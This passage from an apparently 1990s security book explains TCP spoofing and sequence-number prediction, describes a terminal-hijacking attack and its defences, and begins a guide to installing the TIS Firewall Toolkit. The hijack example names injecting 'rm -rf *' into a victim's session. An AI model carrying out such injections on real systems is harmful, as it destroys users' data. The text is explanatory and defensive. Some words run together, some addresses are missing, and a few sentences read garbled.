Spoofing TCP ConnectionsTCP builds a connection-oriented, reliable byte stream on top of IP that can sendconnectionless, unreliable datagrams. It is possible for an attacker’s machine to spoof bysending IP datagrams that have an IP source address belonging to another machine. Suchspoofing provides a mechanism for an attack on the security of any machine using IP to receivecommands.

The attacker’s machine can send IP datagrams with a forged source address to other machineswhile the machine legitimately possessing that IP address is active. It can do so with nointention of getting replies to those datagrams. The other machines will accept these datagramsas coming from the legitimate holder of the IP source address of these forged datagrams. Theywill carry out actions not actually requested by the user of the legitimate machine.

Typically, IP-based application protocols have some notion of a session with some informationexchanged at startup, which is used to identify the two parties to each another during theactive part of the session. One effect of the information exchange is that a third party cannotpose as one of the initial two parties. If a sniffer is being used by the attacker, it becomes easyfor the attacker to pose as either party. For example, in the NFS protocol, a client will firstexchange information with the server’s mount daemon. After this exchange, the client will beable to open and read or write files on the server by making requests of the NFS daemon. Anattacker can wait for the client to mount a file system and open a file. If the attacker sends outan appropriately formatted UDP datagram, the server will process an NFS request and sendthe results back to the client. Regardless of the client’s reaction to the unexpected reply, if therequest was a write request, the attacker will have succeeded in writing some information tothe server’s disk. If the request was a read request and the attacker has a sniffer between theclient and server, the attacker will succeed in finding out some of the contents of the disk viathe sniffer.

Through the use of datagrams with forged IP addresses, an attacker can get datagrams holdingrequests accepted as valid but cannot get replies to those requests without a sniffer. In the NFSscenario described earlier, you were using UDP and assumed the attacker had a sniffer toobtain the credentials that allowed acceptance of the request as valid. You might assume that ifyou use a connection-oriented protocol, such as TCP, you might be more secure. If you canrule out an attacker having a sniffer between the client and the server, the attacker would beunable to obtain the needed credentials. Unfortunately, these assumptions are valid.

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Introduction to TCP/IP End-to-End HandshakingTo understand how an attacker might be able to send datagrams accepted as valid, you need tounderstand the information exchanged between the parties of a TCP connection. A TCPconnection proceeds through three stages:

■ Connection setup

■ Data exchange

■ Connection tear-down

TCP Connection SetupTCP connection setup requires a three-way handshake between the two parties. Initially, oneparty is passively waiting for the establishment of a connection. This passive party is said to be“listening.” The passive party is typically a server. The other party actively opens the TCPconnection by sending the first IP datagram. The active party is typically a client. The defini-tion of client and server is separate from active and passive parties during the setup phase. Thisdiscussion refers to the parties as client and server merely to be more suggestive of the typicalroles they will play later.

The client starts things off by sending a TCP header with the SYN flag set. SYN stands for“synchronize” and refers to the synchronization of initial sequence numbers. The TCPprotocol assigns each data byte sent on a connection its own sequence number. Every TCPheader contains a sequence number field corresponding to the sequence number in the firstdata byte of the field. Initial sequence numbers should be random rather than merely arbitrary.Randomness of initial sequence number is important for handling the situation when aconnection is established, the machine on one side crashes, and then attempts to reestablish aconnection. The other machine needs to be able to detect wild out-of-range sequence andacknowledgment numbers to close its side of the connection to the program that is no longerrunning. TCP only sets the SYN flag when the connection is started.

The server replies to the SYN header with a header containing both a SYN and an ACK flagset. ACK stands for “acknowledgment.” The SYN lets the client know its initial sequencenumber—TCP connections are bi-directional. The ACK flag lets the client know that itreceived the initial sequence number. Whenever the acknowledgment number field is valid,corresponding to the sequence number of the next data byte expected, the TCP sets ACK flag.

To complete the connection, the client responds back to the server with a TCP header thathas the ACK flag set. The acknowledgment lets the server know that it is now ready to beginreceiving data. Understanding the sequence of events with SYN and ACK flags during theestablishment of a connection is also important when configuring firewalls (see Chapter 7,“How to Build a Firewall,” for more information).

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TCP Data ExchangeDuring normal TCP data exchange, one party will send one or more TCP/IP datagrams. Theother party will occasionally send back a TCP/IP datagram with the TCP header having theACK flag set to let the sender know that the data arrived. During establishment of the connec-tion both parties also inform the other how much room they have in their receive buffers. TCPtransmits the amount of available room in the window field of the TCP header in eachdatagram sent to inform the sender how much more data may be sent before the receive bufferfills. As the program on the receiving side empties the receive buffer, the number in thewindow field increases. The acknowledgment number specifies the lowest sequence number ofa data byte that it expects to receive. The acknowledgment number plus the number in thewindow field specifies the highest sequence number of a data byte that will be placed in theinput buffer when received.

Occasionally, IP datagrams will arrive out of order. When a datagram arrives earlier thanexpected, the early datagram goes into the receiver’s input buffer but the receiver does notimmediately acknowledge it. When the expected datagram arrives, the receiver may acknowl-edge both sets of TCP data at once. However, at this point, the receiving program will be ableto read both sets of data without waiting for any more action from the sender.

Forged TCP/IP DatagramsTo successfully forge a TCP/IP datagram that will be accepted as part on an existing connec-tion, an attacker only needs to estimate the sequence number to be assigned to the next databyte to be sent by the legitimate sender. Consider the three cases of being exact, being a bit toolow with the estimate, and being a bit too high with the estimate.

If the attacker knows or successfully guesses the exact value of the next sequence number of thenext byte being sent, the attacker can forge a TCP/IP datagram containing data that will beplaced in the receiver’s input buffer in the next available position. If the forged datagramarrives after the legitimate datagram, the receiver may completely discard the forged datagramif it contains less data than the legitimate one. However, if the forged datagram contains moredata, the receiver will discard only the first part. The receiver will place into its input buffer thepart of the forged datagram with data bytes having larger sequence numbers than thosereceived in the earlier legitimate datagram.

On the other hand, if the forged datagram arrives before the legitimate datagram, the legiti-mate datagram will be discarded by the receiver (at least partially).

If the attacker’s guess of the sequence number is a bit too low, it will definitely not get the firstpart of the data in the forged TCP/IP datagram placed in the receiver’s input buffer. However,if the forged datagram contains enough data, the receiver may place the last part of the forgeddata in its input buffer.

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If the attacker’s guess of the sequence number is a bit too high, the receiver will consider it tobe data that simply arrived out of order and put it into its input buffer. Some of the data bytesat the end of the forged datagram may have sequence numbers that do not fit in the currentwindow, so the receiver will discard these. Later, the legitimate datagram arrives to fill in thegap between the next expected sequence number and the sequence number of the first forgeddata byte. Then, the whole forged datagram is available to the receiving program.

Sniffing + Forging = TroubleClearly, one way to obtain an estimate of the sequence numbers in a TCP/IP connection is tosniff the network somewhere between the client and the server. An attacker could possibly becontrolling more than one machine along this path so the machine doing the sniffing need notbe the machine doing the forging.

If a machine on the same physical network as the legitimate sender does the forging, thenrouters will not have much of a chance of stopping the forged datagram. The only possibleplace to stop the forged datagram would be at the router on the forger’s network, where adiscrepancy might be detected between the hardware address of the legitimate sender and theforger.

If a machine on the same physical network as the receiver does the forging, the receiver wouldalso have the opportunity to note such a discrepancy. If the forging occurs on neither of thetwo endpoint networks, then the opportunity to stop the forged datagram decreases. However,in many cases attackers would only have access to physical networks attached to routers with asingle legitimate source network. You can protect your network from being the source of aforging attack by configuring these routers not to forward datagrams with impossible IPnetwork addresses.

One particular case deserves special note. If both endpoints are on the same physical network,an attacker might be bold enough to forge a datagram from another physical network. Becauseonly the destination address needs examination to deliver a datagram, the datagram could getto the receiver via the normal routing mechanisms. However, the router would have theopportunity to detect the forged datagram by noting that the IP source network addressmatches the IP destination network address. Datagrams with matching source and destinationnetwork addresses should not be allowed into the router if the network address matches that ofan internal network.

Note See the files for CERT Advisory CA:95-01 to find out more about actual attacksbased on this special case.

TCP/IP Forging without SniffingWith four billion possible initial sequence numbers, it should be extremely difficult to guess avalid current sequence number for a TCP/IP connection. However, this assumes assignment of

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the initial sequence numbers in a completely random manner. If an attacker establishes a TCP/IP connection with the receiving end of another TCP/IP connection, the attacker also obtainsan initial sequence number from the receiving end. If the initial sequence numbers of the twoconnections are related in some way, the attacker will be able to compute the initial sequencenumber of the other connection.

When the attacker has the initial sequence number of the connection, the next and final step isto estimate how much TCP/IP data has been sent to the receiver. This estimate added to theinitial sequence number estimates the current sequence number. An estimate of the currentsequence number goes into a forged TCP/IP header.

Some TCP/IP implementations use initial sequence numbers generated by a simple randomnumber generator that generates numbers in a fixed order. If the attacker knows this ordering,the attacker can establish a connection at about the same time as the connection to be spoofed.Knowing that connection’s initial sequence number will provide enough information tonarrow the plausible initial sequence numbers for the connection to a very few instead of fourbillion. The way to prevent this attack is to use a TCP/IP implementation that does a good jobof generating random initial sequence numbers.

Terminal Hijacking: An Example of TCP/IP ForgingImagine the following everyday scenario at my workplace. Many workers use windowingsystems such as the X Window system or Microsoft Windows to start terminal sessions to oneor more of the timesharing systems. The most convenient way to use these systems is to havethem start automatically. With this setup, many of the windows will have idle terminal sessionsusing a TCP/IP-based protocol such as telnet, tn3270, or rlogin.

In fact, some of these sessions never are used after they start. Some of these remain idle for daysor weeks at a time. An attacker with ordinary access to one of the timesharing systems caneasily detect the time any particular worker starts a terminal session by monitoring the set ofusers on the timeshared system.

Immediately after the targeted worker logs in to the timesharing system, the attacker deter-mines the initial sequence number of the TCP/IP connection used for the terminal session.The attacker may have received this number using a sniffer running on another host on thenetwork or by taking advantage of the deterministic pattern of initial sequence numbers.

Next, the attacker estimates the number of data bytes the worker’s terminal session has sent tothe timesharing system. Typically, the worker types in at most a username, password, and acommand or two by this time. By simply estimating the number of data bytes to be betweenzero and one hundred, the attacker will be close enough to hit the window of acceptablesequence numbers.

To do some real damage, the attacker simply has to insert a sequence of characters in the datastream that correspond to a command being typed in at the command prompt. Just to be sure

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that the command is accepted as an entire command, the attacker could place characters inthe data stream that would exit a typical application and get to new command line. Putting“rm -rf *” on the command line in Unix deletes all files in the current directory along with allfiles in all subdirectories of the current directory.

If the attacker really wants to spook the worker, he or she could wait to see if the terminalsession will remain idle overnight while the worker is gone, the office locked, and all thephysical security mechanisms in place to ensure no one enters the office.

If the attacker determines the exact initial sequence number for the terminal session, thecommand is executed by the timesharing system in the worker’s absence. The echo of thepresumed keystrokes will appear in the worker’s terminal window along with a new commandprompt indicating that the command has completed. Imagine the surprise the worker getswhen he or she shows up in the morning and sees this terminal window. Imagine the horror ofrealizing that backups were done shortly after the command executed and that a whole backupperiod of work has been lost.

Reducing the Risks of TCP/IP SpoofingOne way to reduce the threat of this sort of attack is to simply log out of all terminal sessionsbefore they become inactive and only start up terminal sessions when you need them. Inactiveterminal sessions are the easiest to hijack.

A second way to reduce the threat is to use an implementation of the terminal session protocol(telnet or rlogin) that inserts extra terminal protocol data transmitted to the timesharingmachine. Doing so will not fool a sniffer, but it will make it harder for the attacker who isguessing that the terminal protocol sends only a small, relatively fixed amount of data beforethe user begins typing commands.

A third way to reduce the threat is to avoid the use of terminal session protocols between theuser’s desktop and the timesharing machine. For example, with the X Window system, youhave the option of running the windowing program (for example, xterm) on the desktop andthen starting a remote terminal session with the windowing program.

You can also run the windowing program on the timesharing machine and use the X protocolto have the window displayed on your desktop. Using X may introduce its own set of securityproblems, but convincing the timesharing system to accept forged data as keystrokes requires asomewhat messier process and it is much harder to make a good guess at a current sequencenumber without a sniffer.

A fourth way to reduce the threat of TCP/IP spoofing is to use an encryption-based terminalprotocol. The use of encryption does not help prevent an attacker from making a good guess atthe current sequence number. If the attacker is using a sniffer, the sniffer knows the exact

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current sequence number. Encrypted protocols, however, can limit the consequences ofintroducing forged data on the connection. Unless the encryption is broken, the receiver willaccept the data as valid but the command interpreter will not be able to make sense of it.When the legitimate sender gets acknowledgments for the forged data it will become confusedand may reset the TCP/IP connection, causing the terminal session to be shut down.

The only way to deal with this threat completely with current standardized technology is to usea combination approach. Initial sequence numbers must be unpredictable and fall throughoutthe full range of four billion. TCP/IP data must be encrypted so that unencrypted ormisencrypted data will not be confused with valid commands. You also must simply live withthe possibility that an attacker may cause a TCP/IP connection to reset because of garbageinjected into a connection by an attacker with a sniffer.

Using Next-Generation Standard IP Encryption TechnologyTo stop IP address spoofing, you must use encryption on the entire data portion of an IPdatagram, including the TCP header. By doing so, you prevent a sniffer from determining thesequence numbers of the TCP connection. See RFCs 1825-1830.

One IP encryption technique currently in use is SwIPe. It encrypts the TCP header and theTCP data, preventing sniffers from finding sequence numbers. This program is considerablymore sophisticated than that, and goes well beyond the scope of the kind of coverage providedin this chapter. Because it requires kernel modification the source code is not of generalinterest; if you are interested, however, use anonymous FTP to access

An emerging standardized IP encryption technique is specified in “RFC 1825: SecurityArchitecture for the Internet Protocol.” It is a standards-track specification for an option to thecurrent version of IP (IPv4) and a required part of the next generation of IP (Ipv6). RFC 1825specifies two parts: an authentication header (AH) and an encapsulating security payload.These two parts may be used separately or in combination. The use of the authenticationheader prevents the forging of IP datagrams. The encapsulated security payload encrypts thecontent of the IP datagram, including the TCP header.

The following RFCs detail a proposed standard authored by R. Atkinson of the Naval Re-search Laboratory and published in August 1995:

■ RFC 1825: Security Architecture of the Internet Protocol

■ RFC 1826: IP Authentication Header

■ RFC 1827: IP Encapsulating Security Payload

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The following RFCs detail the mechanisms behind RFC 1826 and RFC 1827, respectively,and are part of the proposed standard. They were authored by Metzger, Karn, and Simpsonand published in August 1995. RFC 1851 and RFC 1852, published in September 1995, arefollow-ups to these papers. The newer RFCs are, as of this writing, still “experimental” ratherthan part of a “proposed standard.”

■ RFC 1828: IP Authentication using Keyed MD5

■ RFC 1829: The ESP DES-CBC Transform

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How to Build a Firewall







7very day, people use insurance to protect their valuables

from fire or theft. Businesses protect themselves from

intellectual theft through patents and trademarks.

Because the use of global networking has increased the

information flow and dependence upon our computing

technology, Information System Managers have realized

the need to protect their computing systems, networks,

and information from damage and theft. Although

there are several ways this can be achieved, the most

prevalent is the use of a firewall.


Click anywhere on this page to jump to the Contents at a Glance page.

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When considering construction and building architecture, the “fire wall” is used to protect thebuilding structure from damage should a fire erupt within the structure. The concept appliesin a similar fashion to computer technology, except that often we are attempting to protectourselves from the fire that exists outside our “wall.” A firewall, per se, consists of a machine ormachines, that are separated from both the external network, such as the Internet, and theinternal network by a collection of software that forms the “bricks” within the firewall.

Strictly speaking, a firewall can be defined as a collection of components that is placed betweentwo networks. Collectively, the following properties exist:

■ All traffic in either direction must pass through the firewall.

■ Only traffic authorized by the local security policy will be allowed to pass.

■ The firewall itself is immune to penetration.

This chapter examines the Trusted Information Systems (TIS) Firewall Toolkit, that isprovided as a consturction set for building a firewall. The chapter discusses how to get it,compile it, and the major building blocks in the package.

The TIS Firewall ToolkitThe Firewall Toolkit produced by Trusted Information Systems, also known as TIS, is not asingle integrated package, but a set of tools that are used to build a firewall. For this reason, itis not for everyone who intends to construct and operate a firewall. Consequently, it is difficultto produce documentation that can be used in all situations.

Remember that a firewall is intended to be the security policy your organization has chosen todevelop and support. In this chapter, you will examine how to compile the TIS Toolkit, andconfigure the various components that make up the kit. By the end of the chapter, you willknow the techniques and issues concerned with the construction of a firewall using thisToolkit.

Understanding TISThe TIS Firewall Toolkit is a collection of applications that, when properly assembled with asecurity policy, forms the basis of a firewall. This Toolkit is available as freeware to the Internetuser community. As such, the Toolkit has gained a wide following, and is in use worldwide.

The Toolkit is not a single integrated package like most commercial packages. Rather, it is a setof tools for building a number of different types of firewalls. Because of its inherent flexibility,a wide variety of combinations are possible regarding the installation and configuration of theTIS Toolkit. As such, this chapter explains what the Toolkit is and how the underlying

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technology works. With this knowledge in hand, and a copy of the Toolkit in another, youwill be able to configure the Toolkit for your protection.

Where to Get TIS ToolkitThe TIS Toolkit is available from the site, in the directory /pub/firewalls/toolkit.The filename is fwtk.tar.Z.

After you retrieve the file, it must be uncompressed and extracted from the tar archive. Whileyou’re at the TIS anonymous FTP site, you may want to examine its collection of firewalldocumentation and information. After uncompressing and extracting the archive, the directorystructure illustrated in figure 7.1 is created.

When the files are extracted from the tar archive, the next task is to compile them. Beforecompiling, any site specific changes should be made to firewall.h and the Makefile.config files.Major issues that you need to consider are the installation location of the Toolkit—defaults to/usr/lcoal/etc—and how the library and compiler are to be configured.

Note Most users may experience difficulties compiling the X-gw proxy. The reason for thisis this program’s dependencies on the X Window System Athena Widget set. If youdo not have this widget set, you will experience problems in getting this applicationto compile.






























fwtk Figure 7.1The TIS Toolkit directorystructure.

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Compiling under SunOS 4.1.3 and 4.1.4There should be little difficulty in compiling the TIS Toolkit under the SunOS 4.1.3 and4.1.4 operating systems. There are no changes required from the base configuration to achievea successful compile. After the archive is extracted, a successful compile can be achieved evenwithout modifying the Toolkit configuration.

Compiling under BSDINo significant surprises occur when you compile the Toolkit under BSD/OS Version 2.0 fromBSD, Inc. A few changes do need to be made to ensure the compile is successful, however.First, the Makefiles are not in the correct format for the make command. In TIS, the Makefilesuse the syntax:

include Makefile.config

This syntax is not understood by the make command that is shipped with BSD/OS. To resolvethe problem you can edit each of the Makefiles by hand, or use the program fixmake. Theinclude statement also requires a small change. The required format looks like this:

.include <Makefile.config>

If you edit the Makefiles by hand, this is what the change looks like. However, you can alsouse the fixmake command to correct the syntax of the Makefile by removing the includestatement and including all of the required instructions in one Makefile.

While you are tweaking, it is a good idea to make the following additional changes. No otherchanges are necessary.

CC= gccCOPT= -g -traditional -DBSDI

Code ChangesSeveral issues need to be considered when you compile the Toolkit components. These issuesrevolve primarily around the definition of sys_errlist. To resolve the problem, you must changethe declaration of sys_errlist in all places where it is declared. For example, sys_errlist is definedin the code as:

extern char *sys_errlist[];

Commenting out the line using the C comment symbols (/* */) results in a successful compileof the source code:

/* extern char *sys_errlist[]; */

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Installing the ToolkitAfter the compile process completes successfully, you must install the files in the appropriateplace. The easiest way to install these files is to use the command:

make install

This command uses information in the Makefile to place the objects in the correct place. Theprocess is shown in the following command sequence:

pc# make installif [ ! -d /usr/local/etc ]; then mkdir /usr/local/etc; fifor a in config lib auth smap smapd netacl plug-gw ftp-gw tn-gw rlogin-gw http-gw; do ( cd $a; echo install: ‘pwd‘; make install ); doneinstall: /usr/tis/fwtk/configif [ ! -f /usr/local/etc/netperm-table ]; then cp netperm-table /usr/local/etc; chmod 644 /usr/local/etc/netperm-table; fiinstall: /usr/tis/fwtk/libinstall: /usr/tis/fwtk/authif [ -f /usr/local/etc/authsrv ]; then mv /usr/local/etc/authsrv /usr/local/etc/authsrv.old; ficp authsrv /usr/local/etcchmod 755 /usr/local/etc/authsrvif [ -f /usr/local/etc/authmgr ]; then mv /usr/local/etc/authmgr /usr/local/etc/authmgr.old; ficp authmgr /usr/local/etcchmod 755 /usr/local/etc/authmgrif [ -f /usr/local/etc/authload ]; then mv /usr/local/etc/authload/usr/local/etc/authload.old; ficp authload /usr/local/etcchmod 755 /usr/local/etc/authloadif [ -f /usr/local/etc/authdump ]; then mv /usr/local/etc/authdump/usr/local/etc/authdump.old; ficp authdump /usr/local/etcchmod 755 /usr/local/etc/authdumpinstall: /usr/tis/fwtk/smapif [ -f /usr/local/etc/smap ]; then mv /usr/local/etc/smap /usr/local/etc/➥smap.old; ficp smap /usr/local/etcchmod 755 /usr/local/etc/smapinstall: /usr/tis/fwtk/smapdif [ -f /usr/local/etc/smapd ]; then mv /usr/local/etc/smapd /usr/local/etc/➥smapd.old; ficp smapd /usr/local/etcchmod 755 /usr/local/etc/smapdinstall: /usr/tis/fwtk/netaclif [ -f /usr/local/etc/netacl ]; then mv /usr/local/etc/netacl /usr/local/etc/netacl.old; ficp netacl /usr/local/etcchmod 755 /usr/local/etc/netaclinstall: /usr/tis/fwtk/plug-gwif [ -f /usr/local/etc/plug-gw ]; then mv /usr/local/etc/plug-gw /u

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sr/local/etc/plug-gw.old; ficp plug-gw /usr/local/etcchmod 755 /usr/local/etc/plug-gwinstall: /usr/tis/fwtk/ftp-gwif [ -f /usr/local/etc/ftp-gw ]; then mv /usr/local/etc/ftp-gw /usr/local/etc/ftp-gw.old; ficp ftp-gw /usr/local/etcchmod 755 /usr/local/etc/ftp-gwinstall: /usr/tis/fwtk/tn-gwif [ -f /usr/local/etc/tn-gw ]; then mv /usr/local/etc/tn-gw /usr/local/etc/tn-➥gw.old; ficp tn-gw /usr/local/etcchmod 755 /usr/local/etc/tn-gwinstall: /usr/tis/fwtk/rlogin-gwif [ -f /usr/local/etc/rlogin-gw ]; then mv /usr/local/etc/rlogin-gw /usr/local/etc/rlogin-gw.old; ficp rlogin-gw /usr/local/etcchmod 755 /usr/local/etc/rlogin-gwinstall: /usr/tis/fwtk/http-gwif [ -f /usr/local/etc/http-gw ]; then mv /usr/local/etc/http-gw /usr/local/etc/http-gw.old; ficp http-gw /usr/local/etcchmod 755 /usr/local/etc/http-gw

With the Toolkit successfully installed and compiled, the next step is the security policy andthe configuration of the Toolkit.

Preparing for ConfigurationWhen configuring the Toolkit, the first step is to turn off all unnecessary services that arerunning on the system that will affect your firewall. This requires that you have some level ofUnix knowledge regarding the system startup procedure and services for your system. Forexample, you may have to:

■ Edit the /etc/inetd.conf file

■ Edit the system startup scripts such as /etc/rc /etc/rc2.d/* and others

■ Edit the operating system configuration to disable unnecessary kernel-based services

You can use the ps command to see that a number of services are in operation. The followingoutput shows such services on a sample system:

pc# ps -auxUSER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMANDroot 442 0.0 1.7 144 240 p0 R+ 3:34AM 0:00.04 ps -auxroot 1 0.0 1.7 124 244 ?? Is 3:02AM 0:00.08 /sbin/init --root 2 0.0 0.1 0 12 ?? DL 3:02AM 0:00.01 (pagedaemon)root 15 0.0 6.0 816 888 ?? Is 3:03AM 0:00.47 mfs -o rw -s 1

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root 36 0.0 1.5 124 220 ?? Ss 3:03AM 0:00.21 syslogdroot 40 0.0 1.2 116 176 ?? Ss 3:03AM 0:00.06 routed -qroot 77 0.0 0.5 72 72 ?? Ss 3:03AM 0:00.34 updateroot 79 0.0 1.6 284 232 ?? Is 3:03AM 0:00.08 cronroot 85 0.0 0.3 72 36 ?? I 3:03AM 0:00.01 nfsiod 4root 86 0.0 0.3 72 36 ?? I 3:03AM 0:00.01 nfsiod 4root 87 0.0 0.3 72 36 ?? I 3:03AM 0:00.01 nfsiod 4root 88 0.0 0.3 72 36 ?? I 3:03AM 0:00.01 nfsiod 4root 91 0.0 1.0 96 144 ?? Is 3:03AM 0:00.07 rwhodroot 93 0.0 1.3 112 180 co- I 3:03AM 0:00.05 rstatdroot 95 0.0 1.3 128 192 ?? Is 3:03AM 0:00.07 lpdroot 97 0.0 1.3 104 184 ?? Ss 3:03AM 0:00.13 portmaproot 102 0.0 1.6 332 224 ?? Is 3:03AM 0:00.05 (sendmail)root 108 0.0 1.4 144 200 ?? Is 3:03AM 0:00.11 inetdroot 117 0.0 2.1 228 300 co Is+ 3:03AM 0:00.90 -csh (csh)root 425 0.0 2.0 156 292 ?? S 3:33AM 0:00.15 telnetdchrish 426 0.0 2.1 280 304 p0 Ss 3:33AM 0:00.26 -ksh (ksh)root 440 0.4 1.9 220 280 p0 S 3:34AM 0:00.17 -su (csh)root 0 0.0 0.1 0 0 ?? DLs 3:02AM 0:00.01 (swapper)pc#

By editing the /etc/inetd.conf file so that it resembles the following output, you can reduce thenumber of active processes. This reduces the load on the system and, more importantly, doesnot accept TCP connections on unnecessary ports.

## Internet server configuration database## BSDI $Id: inetd.conf,v 2.1 1995/02/03 05:54:01 polk Exp $# @(#)inetd.conf 8.2 (Berkeley) 3/18/94## ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A# telnet stream tcp nowait root /usr/libexec/tcpd telnetd# shell stream tcp nowait root /usr/libexec/tcpd rshd# login stream tcp nowait root /usr/libexec/tcpd rlogind -a# exec stream tcp nowait root /usr/libexec/tcpd rexecd# uucpd stream tcp nowait root /usr/libexec/tcpd uucpd# finger stream tcp nowait nobody /usr/libexec/tcpd fingerd# tftp dgram udp wait nobody /usr/libexec/tcpd tftpd# comsat dgram udp wait root /usr/libexec/tcpd comsat# ntalk dgram udp wait root /usr/libexec/tcpd ntalkd# pop stream tcp nowait root /usr/libexec/tcpd popper# ident stream tcp nowait sys /usr/libexec/identd identd -l# #bootp dgram udp wait root /usr/libexec/tcpd bootpd -t 1# echo stream tcp nowait root internal# discard stream tcp nowait root internal# chargen stream tcp nowait root internal# daytime stream tcp nowait root internal# tcpmux stream tcp nowait root internal# time stream tcp nowait root internal# echo dgram udp wait root internal# discard dgram udp wait root internal

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# chargen dgram udp wait root internal# daytime dgram udp wait root internal# time dgram udp wait root internal# Kerberos authenticated services#klogin stream tcp nowait root /usr/libexec/rlogind rlogind -k#eklogin stream tcp nowait root /usr/libexec/rlogind rlogind -k -x#kshell stream tcp nowait root /usr/libexec/rshd rshd -k# Services run ONLY on the Kerberos server#krbupdate stream tcp nowait root /usr/libexec/registerd registerd#kpasswd stream tcp nowait root /usr/libexec/kpasswdd kpasswdd

The reason for turning off all these services is to reduce the likelihood that your system will becompromised while the firewall is being installed and configured. You should also use theconsole to perform the initial setup and configuration of the firewall. With the /.etc/inetd.conffile updated, inetd must be signaled to know that some changes have been made. This signal isgenerated using the command:

kill -1

The process identifier (PID) can be procured, and inetd restarted by using this commandsequence:

pc# ps -aux | grep inetdroot 108 0.0 1.4 144 200 ?? Is 3:03AM 0:00.11 inetdpc# kill -1 108

To ensure that the services are turned off, you can attempt to connect to a service offered byinetd:

pc# telnet pc ftpTrying Unable to connect to remote host: Connection refusedpc#

Now that the inetd services are disabled, disable other services that are part of the system startup files and the kernel. Some of these services are system specific, which might require someexploration. Nevertheless, try to find the following services and processes and turn them off.

gated, cgd pcnfsd rwhod

mountd portmap sendmail

named printer timed

nfsd rstatd xntpd


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Tip While timed, which is when the NTP time server process is turned off, you shouldconfigure your firewall to get time updates via an NTP server. This allows yourfirewall clock to have accurate time, which may prove invaluable should you takelegal action.

After turning off these daemons, the process table on the sample system now looks like this:$ ps -auxUSER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMANDchrish 89 2.3 2.1 280 304 p0 Ss 4:24AM 0:00.25 -ksh (ksh)root 1 0.0 1.7 124 244 ?? Is 4:18AM 0:00.07 /sbin/init --root 2 0.0 0.1 0 12 ?? DL 4:18AM 0:00.01 (pagedaemon)root 15 0.0 3.2 816 464 ?? Is 4:19AM 0:00.08 mfs -o rw -s 1root 36 0.0 1.5 124 220 ?? Ss 4:19AM 0:00.17 syslogdroot 71 0.0 0.5 72 72 ?? Ss 4:19AM 0:00.05 updateroot 73 0.0 1.8 284 256 ?? Is 4:19AM 0:00.05 cronroot 75 0.0 1.3 140 192 ?? Ss 4:19AM 0:00.04 inetdroot 84 0.0 2.0 220 292 co Is+ 4:19AM 0:00.26 -csh (csh)root 88 0.1 2.0 156 292 ?? S 4:24AM 0:00.13 telnetdroot 0 0.0 0.1 0 0 ?? DLs 4:18AM 0:00.00 (swapper)chrish 95 0.0 1.6 136 232 p0 R+ 4:24AM 0:00.02 ps$

The ps command output shown now represents a quiet system. For clarification, the mfscommand in the ps output is for a memory-based temporary file system on the BSDI Version2.0 Operating System. However, this does not really list the actual services that are providedon this system. In the sample inetd.cof file presented earlier, virtually all the available networkservices were disabled. This is illustrated in the output of the netstat command:

pc# netstat -aActive Internet connections (including servers)Proto Recv-Q Send-Q Local Address Foreign Address (state)tcp 0 0 pc.telnet stargazer.1037 ESTABLISHEDtcp 0 0 *.telnet *.* LISTENudp 0 0 *.syslog *.*Active Unix domain socketsAddress Type Recv-Q Send-Q Inode Conn Refs Nextref Addrf0764400 dgram 0 0 0 f0665c94 0 f0665214f074e480 dgram 0 0 0 f0665c94 0 0f0665c00 dgram 0 0 f0665780 0 f06d6194 0 /dev/logpc#

The tools directory in the Toolkit distribution includes a utility called portscan, which probesa system to determine what TCP services are currently being offered. This program probes theports on a system and prints a list of available port numbers, or service names. The output ofthe command is shown here:

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pc# ./portscan pc791319212325...512513shell10531054105510561057pc#

This command shows what ports were available prior to reducing the available services. Afterreducing those services by shutting off the entries in inetd.conf and the startup files, the systemnow offers the following ports:

pc# ./portscan pc2123pc#

With the host almost completely shut down from the network, the next step is to configureTIS Toolkit components.

Configuring TCP/IPFor TIS to be effective as a firewall, the system on which it is running must not performrouting. A system that has two or more network interfaces must be configured so that it doesnot automatically route packets from one interface to another. If this occurs, services that arebeing constructed with the TIS Toolkit will not be used.

IP ForwardingTo receive any real benefits from a firewall installation, you need to make sure IP forwardinghas been disabled. IP forwarding causes the packets received on one interface to be retransmit-ted on all other applicable interfaces. To help illustrate IP forwarding, suppose you areconsidering setting up a firewall on the system in figure 7.2.

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This machine has two interfaces: one is for the local area network, which has an IP address of204.191.3.150. The other interface is for the wide area network, and is a PPP link using an IPaddress of When IP forwarding is enabled, any packets received on the LANinterface of this machine that are destined for a different network are automatically forwardedto the PPP link. The same is true for packets on the PPP link. If the packets received on thePPP link are for the rnet, they will be transmitted on the ethernet interface in the machine.

This type of arrangement is unsuitable for a firewall. The reason is that the firewall will stillpass unlogged and unauthenticated traffic from either direction. Consequently, there is little orno point to going through this exercise if you leave IP forwarding enabled.

Disabling IP forwarding usually requires that a new kernel be configured. The reason for this isthat the process of IP disabling involves changing some kernel parameters. Table 7.1 listsparameters that must be changed for the identified operating systems.

Table 7.1Disabling IP Forwarding

Operating System Parameter

BSDI Version 2.0 Make sure GATEWAY is commented out in the kernel configu-ration files.

SunOS 4.1.x Run adb on the kernel to set IP_forwarding to -1, and save themodified kernel image. Alternatively, modify /usr/kvm/sys/netinet/in_proto.c ) to set the variable to -1 by default and rebuild thekernel.

After making the required changes to the kernel parameters, you need to build a new kernel,install it, and reboot. This removes any configured IP forwarding, and enables you to maxi-mize the capabilities of the Toolkit. After IP forwarding is removed, all traffic requests eitherinto or out from the private network need to be made through the proxy servers on thefirewall.



Figure 7.2Multihomed machines.

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The netperm TableThe netperm table, found in /usr/local/etc/netperm-table, is the master configuration file forall the components in the Trusted Firewall Toolkit (netacl, smap, smapd, ftp-gw, tn-gw, andplug-gw). When an application in the Toolkit starts, it reads its configuration and permissionsinformation from netperm-table and stores it in an in-memory database. Saving the informa-tion in an in-memory database allows the information to be preserved, even after a chrootsystem call is used to reset the directory structure.

The permissions/configuration file is organized into rules. Each rule is the name of theapplication that rule applies to, followed by a colon. Multiple applications can be targeted by asingle rule by separating the names with commas, or wildcarding them with an asterisk. Whenan application extracts its configuration information, it only extracts the rules that apply to it,preserving the order in which they appeared in the file. The following sequence lists a sampleset of rules for the smap and smapd application.

# sample rules for smap smap, smapd: userid 4 smap, smapd: directory /mail/inspool smap: timeout 3600

Note Comments regarding the rules can be inserted in the configuration file by startingthe line with “#” as the first character. As with any configuration file or program, themore comments that are used, the easier it is later to maintain the rules.

